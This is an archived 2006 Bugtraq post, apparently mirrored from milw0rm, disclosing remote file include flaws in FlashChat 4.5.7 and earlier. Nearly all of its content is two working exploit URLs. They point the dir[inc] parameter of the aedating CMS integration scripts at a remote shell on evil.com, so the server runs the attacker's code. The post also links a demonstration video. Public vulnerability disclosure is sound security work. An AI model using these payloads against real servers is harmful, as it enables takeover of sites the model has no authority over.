[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FlashChat <= 4.5.7 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FlashChat <= 4.5.7 Remote File Include Vulnerability
From: mc.nadz@xxxxxxxxx
Date: 4 Sep 2006 15:57:19 -0000

NeXtMaN <mc.nadz [at] gmail.com>

Here are 2 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html

# milw0rm.com [2006-09-04]

Prev by Date: Re: VirtualPC 2004 (build 528) detection (?)
Next by Date: rPSA-2006-0163-1 openssl openssl-scripts
Previous by thread: UPDATE: [ GLSA 200509-09 ] Py2Play: Remote execution of arbitrary Python code
Next by thread: rPSA-2006-0163-1 openssl openssl-scripts
Index(es):
- Date
- Thread